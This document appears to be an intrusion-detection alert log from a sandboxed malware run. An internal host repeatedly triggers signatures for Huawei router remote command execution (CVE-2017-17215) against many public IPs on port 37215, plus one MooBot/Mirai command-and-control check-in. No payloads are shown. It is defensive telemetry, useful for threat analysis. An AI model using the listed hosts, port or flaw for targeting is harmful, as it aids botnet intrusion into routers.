                                                    07/10/24-08:27:17.040867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5264637215192.168.2.1469.75.251.162
                                                    07/10/24-08:26:55.439296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5323637215192.168.2.1441.10.134.48
                                                    07/10/24-08:26:25.523968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959437215192.168.2.14151.112.56.54
                                                    07/10/24-08:27:02.970301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002637215192.168.2.1441.115.179.141
                                                    07/10/24-08:27:11.489272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4767037215192.168.2.14157.203.146.6
                                                    07/10/24-08:27:31.540964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384437215192.168.2.14148.139.130.22
                                                    07/10/24-08:26:15.877145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415037215192.168.2.1441.86.110.81
                                                    07/10/24-08:26:43.932018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255037215192.168.2.14157.185.157.2
                                                    07/10/24-08:26:33.175364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044437215192.168.2.14157.82.100.117
                                                    07/10/24-08:26:42.366106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045637215192.168.2.14157.68.194.125
                                                    07/10/24-08:26:33.177669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6029837215192.168.2.1441.220.31.131
                                                    07/10/24-08:26:13.833898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933037215192.168.2.14209.61.40.242
                                                    07/10/24-08:26:42.180724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237437215192.168.2.1441.112.184.48
                                                    07/10/24-08:27:27.141035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5931037215192.168.2.14157.54.192.166
                                                    07/10/24-08:26:26.563571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262837215192.168.2.1441.41.97.3
                                                    07/10/24-08:26:36.406451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4802637215192.168.2.1441.111.44.33
                                                    07/10/24-08:27:14.885760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14197.67.77.227
                                                    07/10/24-08:27:07.371632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.14157.31.87.252
                                                    07/10/24-08:27:08.432094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291837215192.168.2.14157.236.118.214
                                                    07/10/24-08:26:15.838887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4677637215192.168.2.14177.95.156.252
                                                    07/10/24-08:26:34.249652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771237215192.168.2.14116.250.204.30
                                                    07/10/24-08:26:59.707998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946837215192.168.2.1441.39.153.80
                                                    07/10/24-08:26:28.930785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484837215192.168.2.1441.180.97.218
                                                    07/10/24-08:27:30.461337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751237215192.168.2.14197.64.56.219
                                                    07/10/24-08:27:33.861277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525637215192.168.2.14197.138.194.139
                                                    07/10/24-08:26:29.873958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033437215192.168.2.1441.225.96.165
                                                    07/10/24-08:27:33.673739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754237215192.168.2.1441.81.160.206
                                                    07/10/24-08:26:34.188754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4068437215192.168.2.1441.126.175.94
                                                    07/10/24-08:26:43.856706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177037215192.168.2.14157.60.94.208
                                                    07/10/24-08:26:45.646163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556437215192.168.2.1441.66.104.234
                                                    07/10/24-08:26:17.985127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374237215192.168.2.1441.227.102.58
                                                    07/10/24-08:26:25.491059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358637215192.168.2.14197.221.29.0
                                                    07/10/24-08:26:18.021892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4279637215192.168.2.1441.52.11.100
                                                    07/10/24-08:27:00.476444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742437215192.168.2.1441.87.55.158
                                                    07/10/24-08:26:53.186614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5683837215192.168.2.1441.247.234.80
                                                    07/10/24-08:27:23.965651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221437215192.168.2.1441.151.20.24
                                                    07/10/24-08:27:33.681754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4982437215192.168.2.14157.99.176.90
                                                    07/10/24-08:26:31.080592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5820837215192.168.2.14173.164.158.224
                                                    07/10/24-08:26:38.559180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987837215192.168.2.14157.202.68.147
                                                    07/10/24-08:27:19.290878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282237215192.168.2.14197.156.205.40
                                                    07/10/24-08:27:27.122921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860437215192.168.2.14208.175.150.250
                                                    07/10/24-08:27:33.961510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3858037215192.168.2.14161.217.51.2
                                                    07/10/24-08:26:28.887651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238237215192.168.2.1441.207.202.43
                                                    07/10/24-08:26:28.927814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143437215192.168.2.1441.44.165.225
                                                    07/10/24-08:26:51.983079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481437215192.168.2.14157.49.148.7
                                                    07/10/24-08:26:57.641375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838437215192.168.2.14197.47.176.155
                                                    07/10/24-08:26:17.962060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807837215192.168.2.14197.138.146.252
                                                    07/10/24-08:26:43.772841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4171237215192.168.2.1441.118.72.232
                                                    07/10/24-08:26:33.220659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.14166.84.209.78
                                                    07/10/24-08:26:23.345555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863037215192.168.2.14157.119.195.164
                                                    07/10/24-08:27:08.383966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4578237215192.168.2.14157.136.243.200
                                                    07/10/24-08:26:51.975524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419437215192.168.2.14197.40.177.11
                                                    07/10/24-08:27:30.506751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437437215192.168.2.1441.218.160.105
                                                    07/10/24-08:27:17.005251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5187237215192.168.2.14202.214.69.143
                                                    07/10/24-08:26:38.563022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6062837215192.168.2.14111.13.238.108
                                                    07/10/24-08:27:27.141035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3861837215192.168.2.1441.182.46.147
                                                    07/10/24-08:26:26.527286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197437215192.168.2.14157.122.159.182
                                                    07/10/24-08:27:22.810848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716837215192.168.2.14157.230.197.101
                                                    07/10/24-08:26:38.657439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5650037215192.168.2.14197.193.244.243
                                                    07/10/24-08:27:23.881648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305237215192.168.2.1496.206.129.68
                                                    07/10/24-08:26:31.084191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3518837215192.168.2.1463.220.224.62
                                                    07/10/24-08:27:05.143313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500237215192.168.2.14157.15.66.46
                                                    07/10/24-08:26:59.826024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538237215192.168.2.14197.167.207.132
                                                    07/10/24-08:27:08.325316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586637215192.168.2.1441.170.39.30
                                                    07/10/24-08:26:11.120282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4085637215192.168.2.1446.221.220.195
                                                    07/10/24-08:26:43.770002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4754237215192.168.2.14197.96.220.187
                                                    07/10/24-08:26:13.849175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959837215192.168.2.14197.21.190.40
                                                    07/10/24-08:26:41.566110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927437215192.168.2.14197.203.247.85
                                                    07/10/24-08:26:38.598886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440837215192.168.2.14197.112.13.188
                                                    07/10/24-08:26:22.281156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3696037215192.168.2.1441.251.90.2
                                                    07/10/24-08:26:43.668862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5365437215192.168.2.14157.250.123.102
                                                    07/10/24-08:27:11.518596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200237215192.168.2.14157.166.54.37
                                                    07/10/24-08:26:11.501688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866237215192.168.2.14197.249.140.55
                                                    07/10/24-08:26:43.858439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762437215192.168.2.1436.45.15.245
                                                    07/10/24-08:27:10.662603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4153637215192.168.2.1441.85.149.107
                                                    07/10/24-08:26:43.773562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785637215192.168.2.14157.212.155.83
                                                    07/10/24-08:27:34.131250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963237215192.168.2.14197.58.45.192
                                                    07/10/24-08:26:23.299402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4713837215192.168.2.14197.154.225.29
                                                    07/10/24-08:26:41.365312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3422037215192.168.2.1441.116.10.115
                                                    07/10/24-08:26:59.848554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486637215192.168.2.14150.33.79.214
                                                    07/10/24-08:27:28.128256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618437215192.168.2.1482.7.199.237
                                                    07/10/24-08:26:23.333013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470237215192.168.2.14209.33.24.150
                                                    07/10/24-08:26:34.234047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694437215192.168.2.14197.144.129.82
                                                    07/10/24-08:26:11.572202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869237215192.168.2.14197.43.251.239
                                                    07/10/24-08:26:42.370948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4936237215192.168.2.1441.15.169.17
                                                    07/10/24-08:27:02.933980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089037215192.168.2.14157.96.93.192
                                                    07/10/24-08:27:27.077199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5801837215192.168.2.14197.163.189.2
                                                    07/10/24-08:26:15.826179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3725837215192.168.2.14157.194.210.126
                                                    07/10/24-08:27:23.942038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761037215192.168.2.1445.235.7.136
                                                    07/10/24-08:26:48.020359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3657237215192.168.2.14197.154.27.235
                                                    07/10/24-08:26:43.686036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4996637215192.168.2.14197.160.180.13
                                                    07/10/24-08:26:33.196369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318237215192.168.2.14157.253.223.163
                                                    07/10/24-08:27:34.127373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886037215192.168.2.14119.24.30.97
                                                    07/10/24-08:27:14.855642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033837215192.168.2.1441.252.99.219
                                                    07/10/24-08:27:36.285342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818837215192.168.2.14157.38.253.247
                                                    07/10/24-08:27:30.535069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3323637215192.168.2.14157.131.71.32
                                                    07/10/24-08:26:59.651678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376637215192.168.2.14197.203.166.2
                                                    07/10/24-08:26:49.900160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735637215192.168.2.1487.238.61.212
                                                    07/10/24-08:27:33.818731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3963637215192.168.2.14157.252.83.179
                                                    07/10/24-08:27:22.835700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5663837215192.168.2.1441.251.75.54
                                                    07/10/24-08:26:59.566844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110637215192.168.2.14197.212.19.65
                                                    07/10/24-08:26:55.384907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026037215192.168.2.1441.99.157.144
                                                    07/10/24-08:27:08.411856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090237215192.168.2.14197.230.108.181
                                                    07/10/24-08:26:13.780678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797037215192.168.2.1441.156.136.103
                                                    07/10/24-08:27:10.636807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485637215192.168.2.1441.175.56.193
                                                    07/10/24-08:27:10.617343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948237215192.168.2.14197.180.108.111
                                                    07/10/24-08:26:38.525965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425637215192.168.2.14207.18.239.36
                                                    07/10/24-08:27:13.973446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.14197.169.180.137
                                                    07/10/24-08:27:11.489140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507637215192.168.2.14157.36.137.197
                                                    07/10/24-08:26:17.942691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788637215192.168.2.1441.233.142.72
                                                    07/10/24-08:27:32.545025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924037215192.168.2.1441.49.237.210
                                                    07/10/24-08:27:02.786034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3416837215192.168.2.14157.67.108.172
                                                    07/10/24-08:27:07.351373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148037215192.168.2.1471.147.140.73
                                                    07/10/24-08:27:22.879790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362237215192.168.2.1441.74.168.137
                                                    07/10/24-08:26:18.017676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3357837215192.168.2.14197.44.84.95
                                                    07/10/24-08:26:20.113848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257037215192.168.2.1441.87.109.163
                                                    07/10/24-08:27:30.509826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5719037215192.168.2.1462.95.230.21
                                                    07/10/24-08:26:52.077860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4787837215192.168.2.14204.193.8.39
                                                    07/10/24-08:27:13.897664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252237215192.168.2.14197.149.208.1
                                                    07/10/24-08:27:14.003355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030237215192.168.2.14157.38.24.203
                                                    07/10/24-08:26:33.206981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887437215192.168.2.1436.235.134.109
                                                    07/10/24-08:27:02.829526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4045837215192.168.2.14198.155.244.206
                                                    07/10/24-08:27:10.547340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5488837215192.168.2.14197.228.23.235
                                                    07/10/24-08:27:31.465521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452237215192.168.2.14157.161.157.190
                                                    07/10/24-08:27:07.379672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668237215192.168.2.14197.156.160.220
                                                    07/10/24-08:27:20.471536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3870237215192.168.2.1495.112.33.164
                                                    07/10/24-08:26:53.042912TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)557145976192.168.2.1451.79.141.54
                                                    07/10/24-08:27:14.839974TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842437215192.168.2.14157.159.130.244
                                                    07/10/24-08:26:33.189218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5447237215192.168.2.14197.216.172.3
                                                    07/10/24-08:27:22.909297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673037215192.168.2.1459.31.208.92
                                                    07/10/24-08:27:16.994727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197237215192.168.2.1441.223.160.9
                                                    07/10/24-08:26:43.538160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658637215192.168.2.14157.198.164.172
                                                    07/10/24-08:27:10.612080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226237215192.168.2.1441.167.153.123
                                                    07/10/24-08:26:18.037412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047637215192.168.2.14197.84.20.185
                                                    07/10/24-08:26:25.435819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466637215192.168.2.14157.179.210.140
                                                    07/10/24-08:27:11.566038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4925837215192.168.2.1441.174.35.57
                                                    07/10/24-08:26:33.189760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090237215192.168.2.14157.145.33.46
                                                    07/10/24-08:26:34.224175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960237215192.168.2.14197.106.172.225
                                                    07/10/24-08:26:49.853498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885237215192.168.2.14157.87.238.141
                                                    07/10/24-08:26:11.583979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4152037215192.168.2.14157.147.144.222
                                                    07/10/24-08:26:26.528508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214437215192.168.2.14197.51.157.173
                                                    07/10/24-08:26:55.322377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790437215192.168.2.14197.13.67.124
                                                    07/10/24-08:27:33.952249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974037215192.168.2.14157.193.93.72
                                                    07/10/24-08:26:31.077497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3695037215192.168.2.1441.145.134.131
                                                    07/10/24-08:26:26.589238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3840637215192.168.2.1441.0.150.251
                                                    07/10/24-08:26:57.514091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111837215192.168.2.14197.39.16.239
                                                    07/10/24-08:26:43.764086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3888837215192.168.2.1441.89.100.158
                                                    07/10/24-08:26:51.966896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5479237215192.168.2.1441.216.107.230
                                                    07/10/24-08:27:08.373909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014837215192.168.2.1441.225.112.173
                                                    07/10/24-08:26:59.553454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4459037215192.168.2.14197.67.9.39
                                                    07/10/24-08:26:36.412614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071037215192.168.2.14157.202.179.192
                                                    07/10/24-08:26:26.598533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3653437215192.168.2.14202.63.94.59
                                                    07/10/24-08:26:33.165802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4346237215192.168.2.14197.27.253.134
                                                    07/10/24-08:27:07.327851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302237215192.168.2.14179.6.120.76
                                                    07/10/24-08:27:32.489604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14120.63.229.28
                                                    07/10/24-08:26:36.420530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3954037215192.168.2.14157.221.190.30
                                                    07/10/24-08:26:38.590272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3747437215192.168.2.1441.201.184.97
                                                    07/10/24-08:27:23.864190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5048637215192.168.2.1441.74.70.173
                                                    07/10/24-08:27:19.290878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010837215192.168.2.1491.72.39.158
                                                    07/10/24-08:26:55.433517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5000837215192.168.2.14197.161.188.99
                                                    07/10/24-08:26:25.456232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689037215192.168.2.14138.170.140.255
                                                    07/10/24-08:27:19.308441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3401837215192.168.2.1441.58.209.238
                                                    07/10/24-08:26:28.784131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4002037215192.168.2.1477.215.236.165
                                                    07/10/24-08:26:36.441916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5759637215192.168.2.14131.29.98.254
                                                    07/10/24-08:26:59.723852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939637215192.168.2.1460.255.228.162
                                                    07/10/24-08:26:48.002709TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555037215192.168.2.1441.175.68.63
                                                    07/10/24-08:26:28.879483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395237215192.168.2.14157.95.120.98
                                                    07/10/24-08:26:36.392573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240037215192.168.2.14157.240.244.137
                                                    07/10/24-08:26:14.806375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4550637215192.168.2.14124.147.201.209
                                                    07/10/24-08:27:17.034414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6000237215192.168.2.1441.227.191.192
                                                    07/10/24-08:26:13.647061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353237215192.168.2.1441.61.49.105
                                                    07/10/24-08:26:57.647317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3902637215192.168.2.14197.210.103.65
                                                    07/10/24-08:27:27.159132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315637215192.168.2.14157.78.199.151
                                                    07/10/24-08:26:17.960576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186237215192.168.2.14197.66.124.152
                                                    07/10/24-08:27:07.380446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5013637215192.168.2.14155.218.12.165
                                                    07/10/24-08:26:33.161140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5572037215192.168.2.14157.145.40.87
                                                    07/10/24-08:26:26.589872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5704037215192.168.2.14157.120.19.114
                                                    07/10/24-08:26:43.766311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873437215192.168.2.14197.199.130.210
                                                    07/10/24-08:26:45.616185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439637215192.168.2.14197.186.138.87
                                                    07/10/24-08:26:48.004841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221237215192.168.2.14157.159.222.17
                                                    07/10/24-08:26:26.600154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965037215192.168.2.14146.191.119.108
                                                    07/10/24-08:27:24.956941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431237215192.168.2.14221.55.30.79
                                                    07/10/24-08:26:13.776398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870437215192.168.2.1441.216.165.13
                                                    07/10/24-08:26:28.858980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.14197.79.148.125
                                                    07/10/24-08:27:33.771362TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5301237215192.168.2.14157.239.236.48
